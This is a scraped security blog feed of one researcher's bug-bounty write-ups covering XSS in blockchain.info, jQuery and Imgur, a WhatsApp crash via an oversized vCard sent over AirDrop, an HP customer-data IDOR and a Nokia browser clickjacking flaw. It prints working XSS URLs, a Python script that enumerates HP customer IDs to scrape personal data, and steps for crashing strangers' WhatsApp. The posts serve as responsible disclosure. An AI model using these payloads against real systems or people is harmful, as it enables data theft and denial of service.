<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://api2.blockchain.info/charts/total-bitcoins?cors=true&format=csv&lang=en%0AX-XSS-Protection:0%0AContent-Type:text/html%0AContent-Length:35%0A%0A%3Csvg%20onload%3Dalert%28document.domain%29%3E&__cf_waf_tk__=012853002E6loVIOSyqHfdxrvHJ87MshEnZI</span></blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-gMboR-dL7aQ/WfieYWDA4DI/AAAAAAAADqc/HzyfOqDUa9U7yWIAr1owu81fO3UGV2ERwCLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B9.27.30%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="753" data-original-width="1600" height="299" src="https://4.bp.blogspot.com/-gMboR-dL7aQ/WfieYWDA4DI/AAAAAAAADqc/HzyfOqDUa9U7yWIAr1owu81fO3UGV2ERwCLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B9.27.30%2BPM.png" width="640" /></a></div>
<br />
Or a phishing page<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-z7ePgS9cEkA/WfijHs4Iz2I/AAAAAAAADqo/a9YOASmBSqAa6nd8ZGy7_l4tn66sHwrQACLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B9.38.04%2BPM.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://3.bp.blogspot.com/-z7ePgS9cEkA/WfijHs4Iz2I/AAAAAAAADqo/a9YOASmBSqAa6nd8ZGy7_l4tn66sHwrQACLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B9.38.04%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1600" height="234" src="https://3.bp.blogspot.com/-z7ePgS9cEkA/WfijHs4Iz2I/AAAAAAAADqo/a9YOASmBSqAa6nd8ZGy7_l4tn66sHwrQACLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B9.38.04%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Reward 1600$<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com1tag:blogger.com,1999:blog-499911195830393683.post-51292777610267325632017-10-29T04:39:00.002+05:302019-08-17T15:29:29.273+05:30Crashing anyones Whatsapp on IOS<div dir="ltr" style="text-align: left;" trbidi="on">
This was a bug in iOS as well as WhatsApp, which could allow anyone to permanently crash the WhatsApp of the victim under certain conditions.<br />
<br />
I was playing with my iPhone when I realized that I could create contact with "first name" consisting of a very large number of characters in it. Though it worked well, but I had a feeling that its impact will be somewhere as handing huge characters might tremble some of the other apps.<br />
<br />
After an hour or so, I opened WhatsApp to check my messages, and it closed suddenly. I opened again, and the same thing happened. Now I was quick enough to connect the dots. I deleted the contact (with a very big First Name), and my WhatsApp was working.<br />
<br />
I thought of reporting it to apple as well as Facebook, but it was likely to be rejected because it was exploitable only on my own phone. Anyways what's the point of a bug which is exploitable on self.<br />
<br />
So what's next<br />
<br />
Think ..<br />
Thinkk ..<br />
<br />
Flashback of few articles of self XSS which was converted into reflected XSS because the researcher found a way to make it shareable. [Advantage of reading lots of write-ups ]<br />
<br />
connecting dotssss....<br />
<br />
Yes, contacts are sharable!!!<br />
<br />
But my own WhatsApp is crashing how I can share it ???<br />
Hence can't share the malicious contact with others via WhatsApp. SAD!<br />
<br />
Solution<br />
Share it through other messengers. Slack?<br />
<br />
So here are the steps:-<br />
<br />
1) Create a contact with a huge number of characters.<br />
2) Share it with slack or any other messenger app.<br />
3) Victim downloads it.<br />
4) Victim imports it as a contact.<br />
5) Ends up screwing his WhatsApp<br />
<br />
Completely boring!!! So many user interactions required huhhh!<br />
<br />
Plus a contact name with like this looks suspicious<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s1600/IMG_0498.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a><a href="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s1600/IMG_0498.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a><a href="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s1600/IMG_0498.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="900" height="400" src="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s400/IMG_0498.PNG" width="225" /></a></div>
<br />
<br />
Problems to solve now<br />
1)Lessen the number of user interaction required.<br />
2)Make the screen look less suspicion when contact is being displayed.<br />
<br />
While I was looking for alternatives, I found that contacts can be shared as a .vcf file. Bingo!!!<br />
Now I don't need a phone to share the malicious contact file. I can do it on my laptop.<br />
<br />
And I can add space characters to make contact look less suspicious. [Problem 2 solved]<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-_u07_Ytg1ZI/WfUQ-v2cYoI/AAAAAAAADpk/0onO5xJ8R3YXMCTKueg7hD2sVbYhMT-JQCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.06.55%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1003" data-original-width="1600" height="400" src="https://4.bp.blogspot.com/-_u07_Ytg1ZI/WfUQ-v2cYoI/AAAAAAAADpk/0onO5xJ8R3YXMCTKueg7hD2sVbYhMT-JQCLcBGAs/s640/Screen%2BShot%2B2017-10-29%2Bat%2B4.06.55%2BAM.png" width="640" /></a></div>
<br />
<br />
What about sharing the malicious .vcf file? AirDrop baby!!!!<br />
<br />
So here's what we are going to do.<br />
<br />
1) Make a ".vcf" file on my MacBook. Here is a sample one<br />
<br />
https://gist.githubusercontent.com/Shashank-In/4ac499e885714c4e2d47b989fce4a775/raw/dbf7ff6cea88395d3d34c2ca6fafe3a7b4e58674/shashank.vcf<br />
<br />
With 3800 characters included in it with lots of spaces to make it less suspicious when displayed<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-fyEN3oYiI44/WfUFD-btBBI/AAAAAAAADpU/nQaE4RJiEx0RMyCXJ7VuW6f3ZrE32Zt6gCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.00.02%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1038" data-original-width="552" height="320" src="https://3.bp.blogspot.com/-fyEN3oYiI44/WfUFD-btBBI/AAAAAAAADpU/nQaE4RJiEx0RMyCXJ7VuW6f3ZrE32Zt6gCLcBGAs/s320/Screen%2BShot%2B2017-10-29%2Bat%2B4.00.02%2BAM.png" width="170" /></a></div>
<br />
Could have made it spicier like. Victims Crush's phone number <3<br />
<br />
2) Start sharing it to people nearby you through AirDrop. A ".vcf" file, when sent through AirDrop, gets automatically imported in a single click when accepted, unlike another messenger where a person had to manually import it as a contact.<br />
<br />
Once accepted, the number will be saved. And when the next time victim opens his/her WhatsApp, WhatsApp will crash.<br />
<br />
My guess of issue in background . Every time when we open WhatApp perhaps it checks for newly added contacts to automatically show if that the number is associated with WhatApp account . So perhaps while looking for a new contact WhatApp found our malicious contact and could not handle it and hence crashed . And this repeats<br />
WhatApp is opened > It looks for new contacts > Can't handle our malicious contact > crashes<br />
<br />
Victim cannot use his WhatApp :)<br />
<br />
Wewww<br />
<br />
Video POC<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Rewards , NO!<br />
Facebook blamed Apple for it .<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-KLNtsz52Vwg/WfURedbt1DI/AAAAAAAADpo/Zz1rDKobq8caDYQnUL3vG9gXpDh_8ZaFgCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.53.10%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="644" data-original-width="986" height="261" src="https://4.bp.blogspot.com/-KLNtsz52Vwg/WfURedbt1DI/AAAAAAAADpo/Zz1rDKobq8caDYQnUL3vG9gXpDh_8ZaFgCLcBGAs/s400/Screen%2BShot%2B2017-10-29%2Bat%2B4.53.10%2BAM.png" width="400" /></a></div>
<br />
<br />
<br />
Apple happily fixed it in iOS 10.3.3<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rKr9rklHUpA/WfURxi4tuoI/AAAAAAAADpw/BOIAcTujkSAFWggYpxFK520kMmBrUN5QgCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.54.06%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1600" height="129" src="https://2.bp.blogspot.com/-rKr9rklHUpA/WfURxi4tuoI/AAAAAAAADpw/BOIAcTujkSAFWggYpxFK520kMmBrUN5QgCLcBGAs/s640/Screen%2BShot%2B2017-10-29%2Bat%2B4.54.06%2BAM.png" width="640" /></a></div>
<br />
<br />
Though I feel that there was fault from WhatApp too because when I tried the same thing on telegram, telegram truncated the name of the contact to around 50ish and hence did not crash .<br />
<br />
Happy crashing!<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-83081857403076699482015-10-28T17:14:00.003+05:302019-08-17T15:32:21.658+05:30Vulnerability in HP which leaked their users data <div dir="ltr" style="text-align: left;" trbidi="on">
HI! all I am writing blog post really after a very long time. Sorry!<br />
<div>
Well, this is a bug story of HP (Hewlett-Packard). I guess everyone knows about them.</div>
<div>
<br /></div>
<b><i>The Hewlett-Packard Company is an American global information technology company headquartered in Palo Alto, California, United States.</i></b><br />
<div>
<span style="background-color: white;"><span style="font-family: "arial" , sans-serif;"><span style="font-size: 13px; line-height: 14.6545457839966px;"><b><i><br /></i></b></span></span></span></div>
A few months back, I purchased a Laptop of HP. After purchasing, I had to register myself for warranty extensions, and stuff and those processes were online. After completing my process, they sent me an email regarding that, my order has been registered and all. So please download a certificate of that.<br />
<div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px; line-height: 14.6545457839966px;"><br /></span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-P41q1WPlCzQ/VgPseXogZBI/AAAAAAAABv0/8ZAOyXqn1z0/s1600/Hpmail1.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://4.bp.blogspot.com/-P41q1WPlCzQ/VgPseXogZBI/AAAAAAAABv0/8ZAOyXqn1z0/s640/Hpmail1.PNG" width="640" /></a></div>
<div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px; line-height: 14.6545457839966px;"> (CLICK ON THE IMAGE TO ENLARGE IT :) )</span></span></span></div>
<div>
<br />
<div>
Well ok!</div>
</div>
<div>
<br /></div>
<div>
On visiting the link, I was sent to a page which asked me to click and generate my certificate.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Ewr9BI6wFXw/VgPtvT2HLRI/AAAAAAAABv8/t5MqxIKgSFg/s1600/hp-cert.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://2.bp.blogspot.com/-Ewr9BI6wFXw/VgPtvT2HLRI/AAAAAAAABv8/t5MqxIKgSFg/s640/hp-cert.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Let do that :)</div>
<div>
<br /></div>
<div>
On doing that I was redirected to </div>
<div>
<br /></div>
<blockquote class="tr_bq">
https://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:#USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid=30394780&provider=1</blockquote>
Now when I looked at the URL, the parameter <b><i>customerid</i></b> looked interesting. Let change that and check what happens. Viola<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-corTX8O3DGQ/VgPv7X643oI/AAAAAAAABwI/w1_cfUPgzWQ/s1600/data1.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://3.bp.blogspot.com/-corTX8O3DGQ/VgPv7X643oI/AAAAAAAABwI/w1_cfUPgzWQ/s640/data1.PNG" width="640" /></a></div>
<br />
So HP is exposing their customers<br />
Name<br />
Address<br />
Product Serial No.<br />
Product Number Product Description<br />
HP Care Pack Serial Number<br />
<br />
BAD RIGHT?<br />
<br />
Since ID what I got was somewhere 30394780 ... So I guess too many data getting exposed.<br />
<br />
I wrote a simple python code for it.<br />
<br />
<blockquote class="tr_bq">
import re<br />
import urllib2,sys<br />
from bs4 import BeautifulSoup<br />
id = 30394790<br />
while (id < 30394850):<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>html = urllib2.urlopen("http://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:%23USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid={id}&provider=1".format(id=id)).read()<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>soup = BeautifulSoup(html)<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>text = soup.get_text()<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>text2 = text.replace("\n", "")<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>text2 = text2.replace(" ", "\n")<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>text2 = text2.replace("\n", "") #meh was just trying to remove garbage whitespaces<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>id = id + 1<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>print "DATA OF " + str(id) + "\n \n"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>print text2</blockquote>
<div>
just checking users data from id 30394790 to id while 30394850</div>
<div>
<br /></div>
<div>
OUCH </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-sGLcbUhnq30/VgPxL5oCXyI/AAAAAAAABwQ/S_PveB9_N_Y/s1600/exploit_code.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://1.bp.blogspot.com/-sGLcbUhnq30/VgPxL5oCXyI/AAAAAAAABwQ/S_PveB9_N_Y/s640/exploit_code.PNG" width="640" /></a></div>
<div>
<br /></div>
Conclusion everything is getting online, and big companies are yet to realize that their customer's data is at risk. Making worldwide reports on cybersecurity and yet themselves failing to protect their customer's data is an irony.<br />
<br />
And why leaking out these serial number and product ids are bad? Readout this story how a pro-social engineer ripped many big companies, and one of his methods included cracking the serial number pattern of a product.<br />
<br />
http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13930/social-engineering-scripts/</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com3tag:blogger.com,1999:blog-499911195830393683.post-60099355753765084762015-03-25T16:19:00.001+05:302019-08-17T15:34:49.962+05:30The Nokia browser Bug<div dir="ltr" style="text-align: left;" trbidi="on">
Well here is an old Nokia browser bug (for Symbian) which was declared as won't fix by Nokia.<br />
<br />
<b>Test device :- nokia 5233<br />vulnerable application :- Nokia browser 7.3.1.33</b><br />
<br />
Everyone is quite well aware of clickjacking bugs.<br />
<br />
If you don't, then read it out.<br />
<br />
https://www.owasp.org/index.php/Clickjacking<br />
<br />
Most of the website owners use the x-frame header option to avoid clickjacking over their website. And this feature is supported by almost all browser.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-n8UNH1uofVY/VRKNHU98sHI/AAAAAAAABos/-boGvZI4cRA/s1600/google.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://4.bp.blogspot.com/-n8UNH1uofVY/VRKNHU98sHI/AAAAAAAABos/-boGvZI4cRA/s640/google.png" width="640" /></a></div>
<br />
<br />
As it can be seen in the above image, Google uses x-frame-options. So if you try to open their website in an iframe...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Va4JzoU7KRU/VRKNmCAaIhI/AAAAAAAABo0/_PWwZv-sdcI/s1600/nothing.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="598" src="https://3.bp.blogspot.com/-Va4JzoU7KRU/VRKNmCAaIhI/AAAAAAAABo0/_PWwZv-sdcI/s640/nothing.png" width="640" /></a></div>
<br />
<br />
The website won't load. But...<br />
<br />
When the same thing<br />
<br />
<html><br />
<head><br />
<title>Clickjack test page</title><br />
</head><br />
<body><br />
<p>Website is vulnerable to clickjacking!</p><br />
<iframe src="<a href="http://www.google.com/">http://www.google.com</a>" width="350" height="400"></iframe><br />
</body><br />
</html><span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 12.8000001907349px;"><br /></span> Was opened in a Nokia symbian browser<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-NcYbVE60tbg/VRKN6jxRTrI/AAAAAAAABo8/975BIt2HDWo/s1600/nokia_browser_bug.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://4.bp.blogspot.com/-NcYbVE60tbg/VRKN6jxRTrI/AAAAAAAABo8/975BIt2HDWo/s400/nokia_browser_bug.jpg" width="223" /></a></div>
<span style="color: #222222; font-family: "arial" , sans-serif;"><span style="background-color: white; font-size: 12.8000001907349px;"><br /></span></span> Buuhahahah. Kind of universal clickjacking.<br />
<br />
Well, opera browsers were not vulnerable :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Mqaae8iyZEg/VRKOV-4X_pI/AAAAAAAABpE/HK734xLH4Pw/s1600/opera.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://1.bp.blogspot.com/-Mqaae8iyZEg/VRKOV-4X_pI/AAAAAAAABpE/HK734xLH4Pw/s400/opera.jpg" width="223" /></a></div>
<br />
<br />
<br />
I reported it on 21st March 2013<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-BNPZvCSSKF0/VRKO_A9qAQI/AAAAAAAABpM/m-lTVraTsZU/s1600/report.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-BNPZvCSSKF0/VRKO_A9qAQI/AAAAAAAABpM/m-lTVraTsZU/s1600/report.PNG" /></a></div>
<br />
But they said they won't fix.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-iK5JPWGwZ7I/VRKPVBPaT8I/AAAAAAAABpU/Uwh7_UEIDqE/s1600/wontfix.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-iK5JPWGwZ7I/VRKPVBPaT8I/AAAAAAAABpU/Uwh7_UEIDqE/s1600/wontfix.PNG" /></a></div>
<br />
There can be many reasons for not fixing it. The best one I guess is they are busy manufacturing Lumia and Symbian are out of the game :D.<br />
But they should have fixed it because clickjacking is quite harmful in some of the cases and is even used as a catalyst for CSRF attacks. Suppose you are visiting an XYZ website. And the bad website owner has found a CSRF bug. He hides the payload in a frame inside his webpages. Sets the height and width of the frame to zero or changes the opacity to make it invisible, and everything will go un-noticed. Even applicable for an XSS bug. Executing XSS and CSRF inside an invisible frame has the least probability of suspicion rather than crafting the payload URL and send emails or use your ninja S.E tricks to take over the victim.<br />
<br />
<br />
Cheers :)<br />
Sorry for a very late post :)</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com3tag:blogger.com,1999:blog-499911195830393683.post-5570403691255822502014-01-18T03:48:00.004+05:302019-08-17T15:35:43.879+05:30Jquery xss<div dir="ltr" style="text-align: left;" trbidi="on">
Long-time back I reported an XSS in JQuery's website and a few days back I noticed that it was fixed.<br />
<br />
<i>jQuery is a multi-browser JavaScript library designed to simplify the client-side scripting of HTML. It was released on January 2006 at BarCamp NYC by John Resig</i><br />
<br />
http://jqueryui.com/themeroller/#ffDefault=%22/%3E%3Cscript%3Ealert%28/Xss:cyberboy/%29%3C/script%3E<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xTEYxRTBlcg/UtmrKK7rm6I/AAAAAAAABhM/1GUjcJKu0BU/s1600/jquery.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://4.bp.blogspot.com/-xTEYxRTBlcg/UtmrKK7rm6I/AAAAAAAABhM/1GUjcJKu0BU/s1600/jquery.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VLHfG2NqPjc/UtmrqKMhCeI/AAAAAAAABhU/p3Gha6GgYGw/s1600/Jqueryfix.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://4.bp.blogspot.com/-VLHfG2NqPjc/UtmrqKMhCeI/AAAAAAAABhU/p3Gha6GgYGw/s1600/Jqueryfix.PNG" width="320" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-76887477022748061982013-12-25T16:11:00.000+05:302019-08-17T15:37:40.678+05:30waze arbitrary file upload<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Waze</b> is one of the world's largest community-based traffic and navigation app which was acquired by Google on <i>June 11, 2013. </i>And Google opens up responsible disclosure for their acquired websites. So I thought of trying my hands over it.<br />
<div>
<br /></div>
<div>
While I was scrolling around the pages, I found the Waze wiki which allowed users to upload files :]</div>
<div>
<br /></div>
<div>
When I tried uploading a PHP file, the response was </div>
<div>
<br /></div>
<div>
<span style="color: red;"><b>Files of the MIME type "application/x-php" are not allowed to be uploaded</b></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-K58Doty4Pbc/UrC7qeuToNI/AAAAAAAABfc/k8N4UQjesTk/s1600/waze2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://4.bp.blogspot.com/-K58Doty4Pbc/UrC7qeuToNI/AAAAAAAABfc/k8N4UQjesTk/s400/waze2.PNG" width="400" /></a></div>
<div>
<br />
<div>
Well, so the website is filtering files type by checking the MIME type. So no use of uploading arbitrary files by extension spoofing ... HMMMMMM</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Then again, something struck my mind. What more MIME types are filtered?? </div>
<div>
So I tried uploading an SWF file. BINGOOOOO!!!!!</div>
<div>
<br /></div>
<div>
SWF files are not filtered >:)<br />
<br />
So what bad I can do ??</div>
<div>
<br /></div>
<div>
Aaahhaahhh, execute an XSS with a vulnerable SWF file ;-)</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Vh55pVxYhgY/UrC9Eba_yzI/AAAAAAAABfo/Z2j0_6Vo414/s1600/wazexss.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://1.bp.blogspot.com/-Vh55pVxYhgY/UrC9Eba_yzI/AAAAAAAABfo/Z2j0_6Vo414/s400/wazexss.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
Aweee yeahhh!!<br />
<br />
Now they have fixed the bug :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-ZYXF7H-YEc8/Urq00uQeyyI/AAAAAAAABgc/agbVnBhhClc/s1600/wazefix.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://3.bp.blogspot.com/-ZYXF7H-YEc8/Urq00uQeyyI/AAAAAAAABgc/agbVnBhhClc/s400/wazefix.PNG" width="400" /></a></div>
<br />
<br />
And they sent a 100$ reward for this :D, and my name will be listed in their reward hall of fame :)<br />
<br />
<a href="http://www.google.co.in/about/appsecurity/hall-of-fame/reward/">http://www.google.co.in/about/appsecurity/hall-of-fame/reward/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-A6DZljVfxCk/Urq1xPcHSVI/AAAAAAAABgk/0ltom9SYV2U/s1600/reward.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://4.bp.blogspot.com/-A6DZljVfxCk/Urq1xPcHSVI/AAAAAAAABgk/0ltom9SYV2U/s400/reward.PNG" width="400" /></a></div>
<br />
<br />
CHEERS<br />
Shashank (@cyberboyIndia)</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-23218781541442747692013-12-19T13:35:00.002+05:302019-08-17T15:38:16.561+05:30Imgur xss <div dir="ltr" style="text-align: left;" trbidi="on">
Imgur is an online image hosting service founded by Alan Schaaf in 2009 in Athens, Ohio. Imgur describes itself as "the home to the web's most popular image content, curated in real-time by a dedicated community through commenting, voting and sharing.<span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"><br /></span>I spotted a cross-site scripting vulnerability in <a href="http://imgur.com/">http://imgur.com/</a> on 6 FEB 2013.<br />
<span style="background-color: white; font-family: sans-serif; font-size: x-small; line-height: 19.1875px;"><i><br /></i></span> <span style="background-color: white; font-family: sans-serif; font-size: x-small; line-height: 19.1875px;"><i><br /></i></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-xFSQrGMdc2Y/UrKn6BrR1BI/AAAAAAAABf4/mDHYrkX6CBo/s1600/imgurxss.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://1.bp.blogspot.com/-xFSQrGMdc2Y/UrKn6BrR1BI/AAAAAAAABf4/mDHYrkX6CBo/s400/imgurxss.PNG" width="400" /></a></div>
<div>
<br /></div>
I reported the issue to them on the very day I found it and the same day they replied. After 2-3 days the bug was fixed. <span style="font-family: sans-serif; font-size: x-small;"><span style="line-height: 19.1875px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-iW-f2hr9co4/UrKobOYBjPI/AAAAAAAABgA/iO6Q3SAHLG4/s1600/imgur.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://1.bp.blogspot.com/-iW-f2hr9co4/UrKobOYBjPI/AAAAAAAABgA/iO6Q3SAHLG4/s400/imgur.PNG" width="400" /></a></div>
<br />
<span style="font-family: sans-serif; font-size: x-small;"><span style="line-height: 19.1875px;"><br /></span></span> <span style="font-family: sans-serif; font-size: x-small;"><span style="line-height: 19.1875px;">Cheers :)<br />Shashank</span></span></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-77897221877416864372013-12-04T23:31:00.001+05:302019-08-17T15:39:21.680+05:30Capture the Xss<div dir="ltr" style="text-align: left;" trbidi="on">
Everyone is aware of the CTF, and many of you might have been or still are active warriors of CTF. I spotted one XSS in their blog, and they fixed it the very day.<br />
<br />
It was just a random hit as I was reading their blog and then observed the old version of the plupload file which had a know XSS bug.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-MOdk6mCfPa0/Up9sc8OliwI/AAAAAAAABeg/CAH_3oR216o/s1600/CTFxssbug.PNG"><img border="0" height="231" src="https://2.bp.blogspot.com/-MOdk6mCfPa0/Up9sc8OliwI/AAAAAAAABeg/CAH_3oR216o/s400/CTFxssbug.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">This what actually happens when you get the bad habit of xssing everywhere.</span></div>
